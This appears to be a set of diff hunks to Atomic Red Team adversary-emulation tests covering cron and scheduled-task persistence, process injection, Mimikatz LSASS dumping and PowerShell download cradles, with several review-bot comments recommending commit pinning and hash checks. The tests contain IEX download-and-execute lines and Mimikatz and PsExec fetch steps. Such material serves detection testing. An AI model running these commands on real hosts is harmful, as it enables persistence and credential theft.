**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
+15 -3
@@ -21,10 +21,14 @@ This test replaces the current user's crontab file with the contents of the refe
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command | Command to execute | string | /tmp/evil.sh|
| tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil|
@@ -56,10 +60,14 @@ This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
| cron_script_name | Name of file to store in cron folder | string | persistevil|
@@ -96,10 +104,14 @@ This test adds a script to a /var/spool/cron/crontabs folder configured to execu
**Supported Platforms:** Linux
**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log|
| cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil|
+5 -1
@@ -17,10 +17,14 @@ This test adds persistence via a plist to execute via the macOS Event Monitor Da
**Supported Platforms:** macOS
**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_location | evil plist location | path | $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist|
| script_destination | Path where to move the evil plist | path | /etc/emond.d/rules/atomicredteam_T1053_004.plist|
+30 -5
@@ -30,6 +30,10 @@ the tasks, open the Task Scheduler and look in the Active Tasks pane.
**Supported Platforms:** Windows
**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2
@@ -60,10 +64,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
**Supported Platforms:** Windows
**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| task_command | What you want to execute | String | C:&#92;windows&#92;system32&#92;cmd.exe|
| time | What time 24 Hour | String | 72600|
@@ -96,10 +104,14 @@ Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe
**Supported Platforms:** Windows
**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| task_command | What you want to execute | String | C:&#92;windows&#92;system32&#92;cmd.exe|
| time | What time 24 Hour | String | 72600|
@@ -135,6 +147,10 @@ Upon successful execution, powershell.exe will create a scheduled task to spawn
**Supported Platforms:** Windows
**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
@@ -169,10 +185,14 @@ This module utilizes the Windows API to schedule a task for code execution (note
**Supported Platforms:** Windows
**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | String | Word|
@@ -181,7 +201,8 @@ This module utilizes the Windows API to schedule a task for code execution (note
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
```
@@ -197,7 +218,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -216,6 +237,10 @@ Create an scheduled task that executes notepad.exe after user login from XML by
**Supported Platforms:** Windows
**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
+2 -1
@@ -127,7 +127,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
name: powershell
- name: WMI Invoke-CimMethod Scheduled Task
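Review bot: The new executor line `IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)` downloads and executes a script from a mutable branch ref with no integrity check, so whoever can push to that branch controls what runs on every host that executes this test, and the test's behaviour can change silently between runs. Other default URLs on this page pin raw GitHub content to a commit SHA (the SharpView and Invoke-Mimikatz inputs), which is the lighter fix here: replace `master` in the URL with the commit that carries the intended Invoke-MalDoc.ps1, and optionally compare `(Get-FileHash -InputStream ([IO.MemoryStream]::new([Text.Encoding]::UTF8.GetBytes($script)))).Hash` against a recorded SHA-256 before passing the text to `IEX`. Note also that the assignment `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` replaces the process-wide protocol set rather than adding to it (`-bor`), which is acceptable for a one-shot executor but worth a short comment such as `# force TLS 1.2 for the download on hosts that default to TLS 1.0/1.1`. The `atomic_tests` entry this executor belongs to starts before the hunk.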
+5 -1
@@ -19,10 +19,14 @@ This test creates Systemd service and timer then starts and enables the Systemd
**Supported Platforms:** Linux
**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_systemd_service | Path to systemd service unit file | Path | /etc/systemd/system/art-timer.service|
| path_to_systemd_timer | Path to service timer file | Path | /etc/systemd/system/art-timer.timer|
+10 -2
@@ -19,10 +19,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| namespace | K8s namespace to list | String | default|
@@ -48,10 +52,14 @@ Kubernetes Job is a controller that creates one or more pods and ensures that a
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| namespace | K8s namespace to list | String | default|
+6 -2
@@ -24,10 +24,14 @@ With default arguments, expect to see a MessageBox, with notepad's icon in taskb
**Supported Platforms:** Windows
**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_id | PID of input_arguments | Integer | (Start-Process notepad -PassThru).id|
| dll_payload | DLL to Inject | Path | PathToAtomicsFolder&#92;T1055.001&#92;src&#92;x64&#92;T1055.001.dll|
@@ -48,7 +52,7 @@ mavinject $mypid /INJECTRUNNING #{dll_payload}
##### Description: Utility to inject must exist on disk at specified location (#{dll_payload})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+5 -1
@@ -29,10 +29,14 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec
**Supported Platforms:** Windows
**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_binary | Output Binary | Path | PathToAtomicsFolder&#92;T1055.004&#92;bin&#92;T1055.exe|
+13 -4
@@ -22,10 +22,14 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
**Supported Platforms:** Windows
**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:&#92;Windows&#92;System32&#92;cmd.exe|
| parent_process_name | Name of the parent process | string | explorer|
@@ -60,10 +64,14 @@ This module executes notepad.exe from within the WINWORD.EXE process
**Supported Platforms:** Windows
**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | String | Word|
@@ -72,7 +80,8 @@ This module executes notepad.exe from within the WINWORD.EXE process
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
```
@@ -88,7 +97,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
+2 -1
@@ -59,6 +59,7 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
name: powershell
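Review bot: This executor now sources `Invoke-MalDoc.ps1` from the `master` branch of the project repository and pipes it straight into `IEX`, which ties the test's behaviour to whatever that branch contains at run time rather than to a reviewed revision; a detection test that can change under the operator without a corresponding change in this YAML is hard to reason about, and a compromise of the branch becomes code execution on every test host. Pinning the URL to a commit SHA, as the SharpView and Invoke-Mimikatz defaults elsewhere on this page already do, removes that dependency with a one-token change: `IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<commit-sha>/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)`. A comment on the preceding line, `# pinned so the macro helper cannot change without a change to this test`, would make the intent clear to the next editor who is tempted to bump it back to `master`. The surrounding test definition and its `executor:` key begin before the hunk.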
+16 -5
@@ -25,6 +25,10 @@ is required.
**Supported Platforms:** Windows
**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048
@@ -32,7 +36,8 @@ is required.
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
```
@@ -48,7 +53,7 @@ try {
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -70,10 +75,14 @@ The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-
**Supported Platforms:** Windows
**auto_generated_guid:** 3203ad24-168e-4bec-be36-f79b13ef8a83
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| machine | machine to target (via psexec) | string | DC1|
| mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
@@ -95,11 +104,12 @@ The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -108,10 +118,11 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
+4 -1
@@ -26,7 +26,8 @@ atomic_tests:
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
name: powershell
- name: Remote Process Injection in LSASS via mimikatz
@@ -60,6 +61,7 @@ atomic_tests:
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -69,6 +71,7 @@ atomic_tests:
prereq_command: |
if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
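Review bot: The `get_prereq_command` that downloads `mimikatz_trunk.zip` now forces TLS 1.2 but still expands and moves the archive with no integrity check, and a release tag does not guarantee the asset behind it is unchanged; the PSTools download in the following hunk is in the same position and is not even versioned. Recording the SHA-256 of the known-good archive as an input argument and verifying it before `Expand-Archive` is a two-line addition after the `Invoke-WebRequest`: `if ((Get-FileHash "$env:TEMP\mimikatz.zip" -Algorithm SHA256).Hash -ne "#{mimikatz_sha256}") { Remove-Item "$env:TEMP\mimikatz.zip" -Force; throw "mimikatz.zip hash mismatch" }`, with the same pattern for `PsTools.zip`. Since this payload is real credential-dumping tooling, a hash mismatch should abort the prerequisite rather than proceed, which also keeps a tampered binary from being left at `#{mimikatz_path}`. Both `get_prereq_command` blocks continue past the end of their hunks.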
+9 -1
@@ -29,10 +29,14 @@ Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and outp
**Supported Platforms:** Windows
**auto_generated_guid:** d9b633ca-8efb-45e6-b838-70f595c6ae26
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filepath | Name of the local file, include path. | Path | $env:TEMP&#92;key.log|
@@ -67,6 +71,10 @@ Use 'aureport --tty' or other audit.d reading tools to read the log output, whic
**Supported Platforms:** Linux
**auto_generated_guid:** 9c6bdb34-a89f-4b90-acb1-5970614c711b
+8
@@ -20,6 +20,10 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm
**Supported Platforms:** macOS
**auto_generated_guid:** 76628574-0bc1-4646-8fe2-8f4427b47d15
@@ -46,6 +50,10 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
**Supported Platforms:** Windows
**auto_generated_guid:** 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
+6 -2
@@ -20,10 +20,14 @@ Hooks functions in PowerShell to read TLS Communications
**Supported Platforms:** Windows
**auto_generated_guid:** de1934ea-1fbf-425b-8795-65fb27dd7e33
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | Dll To Inject | Path | PathToAtomicsFolder&#92;T1056.004&#92;bin&#92;T1056.004x64.dll|
| server_name | TLS Server To Test Get Request | Url | https://www.example.com|
@@ -44,7 +48,7 @@ curl #{server_name} -UseBasicParsing
##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name})
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_name}) {exit 0} else {exit 1}
if (Test-Path #{file_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+9 -1
@@ -21,10 +21,14 @@ Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | path of output file | path | /tmp/loot.txt|
@@ -57,6 +61,10 @@ Upon successful execution, cmd.exe will execute tasklist.exe to list processes.
**Supported Platforms:** Windows
**auto_generated_guid:** c5806a4f-62b8-4900-980b-c7ec004e9908
+91 -19
@@ -55,10 +55,14 @@ Download Mimikatz and dump credentials. Upon execution, mimikatz dump details an
**Supported Platforms:** Windows
**auto_generated_guid:** f3132740-55bc-48c4-bcc0-758a459cd027
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
@@ -86,10 +90,14 @@ Successful execution will produce stdout message stating "SharpHound Enumeration
**Supported Platforms:** Windows
**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | File path for SharpHound payload | String | PathToAtomicsFolder&#92;T1059.001&#92;src|
@@ -115,7 +123,7 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
##### Description: SharpHound.ps1 must be located at #{file_path}
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -136,6 +144,10 @@ Successful execution will produce stdout message stating "SharpHound Enumeration
**Supported Platforms:** Windows
**auto_generated_guid:** bf8c1441-4674-4dab-8e4e-39d93d08f9b7
@@ -167,6 +179,10 @@ Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1
**Supported Platforms:** Windows
**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804
@@ -193,6 +209,10 @@ Run mimikatz via PsSendKeys. Upon execution, automated actions will take place t
**Supported Platforms:** Windows
**auto_generated_guid:** af1800cf-9f9d-4fd1-a709-14b1e6de020d
@@ -219,6 +239,10 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
**Supported Platforms:** Windows
**auto_generated_guid:** 06a220b6-7e29-4bd8-9d07-5b4d86742372
@@ -245,10 +269,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
**auto_generated_guid:** 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1|
@@ -276,10 +304,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
**auto_generated_guid:** 4396927f-e503-427b-b023-31049b9b09a6
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml|
@@ -307,10 +339,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
**auto_generated_guid:** 8a2ad40b-12c7-4b25-8521-2737b0a415af
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct|
@@ -337,6 +373,10 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
**auto_generated_guid:** cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
#### Run it with these steps!
@@ -359,6 +399,10 @@ art-marker.txt is in the folder.
**Supported Platforms:** Windows
**auto_generated_guid:** fa050f5e-bc75-4230-af73-b6fd7852cd73
@@ -392,6 +436,10 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo
**Supported Platforms:** Windows
**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e
@@ -409,7 +457,7 @@ powershell.exe -version 2 -Command Write-Host $PSVersion
##### Description: PowerShell version 2 must be installed
##### Check Prereq Commands:
```powershell
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -428,10 +476,14 @@ Creates a file with an alternate data stream and simulates executing that hidden
**Supported Platforms:** Windows
**auto_generated_guid:** 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ads_file | File created to store Alternate Stream Data | String | $env:TEMP&#92;NTFS_ADS.txt|
@@ -456,7 +508,7 @@ Remove-Item #{ads_file} -Force -ErrorAction Ignore
##### Description: Homedrive must be an NTFS drive
##### Check Prereq Commands:
```powershell
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -476,10 +528,14 @@ Upon execution, network test info and 'T1086 PowerShell Session Creation and Use
**Supported Platforms:** Windows
**auto_generated_guid:** 7c1acec2-78fa-4305-a3e0-db2a54cddecd
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hostname_to_connect | The host to connect to, by default it will connect to the local machine | String | $env:COMPUTERNAME|
@@ -508,7 +564,7 @@ Try {
}
Catch {
exit 1
}
}
```
##### Get Prereq Commands:
```powershell
@@ -527,10 +583,14 @@ Executes powershell.exe with variations of the -Command parameter
**Supported Platforms:** Windows
**auto_generated_guid:** 686a9785-f99b-41d4-90df-66ed515f81d7
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
| command_param_variation | The "Command" parameter variation to use | String | C|
@@ -552,7 +612,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -571,10 +631,14 @@ Executes powershell.exe with variations of the -Command parameter with encoded a
**Supported Platforms:** Windows
**auto_generated_guid:** 1c0a870f-dc74-49cf-9afc-eccc45e58790
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
| command_param_variation | The "Command" parameter variation to use | String | C|
@@ -597,7 +661,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -616,10 +680,14 @@ Executes powershell.exe with variations of the -EncodedCommand parameter
**Supported Platforms:** Windows
**auto_generated_guid:** 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
| encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E|
@@ -641,7 +709,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -660,10 +728,14 @@ Executes powershell.exe with variations of the -EncodedCommand parameter with en
**Supported Platforms:** Windows
**auto_generated_guid:** 0d181431-ddf3-4826-8055-2dbf63ae848b
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E|
| command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
@@ -686,7 +758,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
+4
@@ -24,6 +24,10 @@ Reference: https://github.com/EmpireProject/Empire
**Supported Platforms:** macOS
**auto_generated_guid:** 3600d97d-81b9-4171-ab96-e4386506e2c2
+11 -3
@@ -21,10 +21,14 @@ Creates and executes a simple batch script. Upon execution, CMD will briefly lau
**Supported Platforms:** Windows
**auto_generated_guid:** 9e8894c0-50bd-4525-a96c-d4ac78ece388
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Command to execute within script. | string | dir|
| script_path | Script path. | path | $env:TEMP&#92;T1059.003_script.bat|
@@ -48,7 +52,7 @@ Remove-Item #{script_path} -Force -ErrorAction Ignore
##### Description: Batch file must exist on disk at specified location (#{script_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{script_path}) {exit 0} else {exit 1}
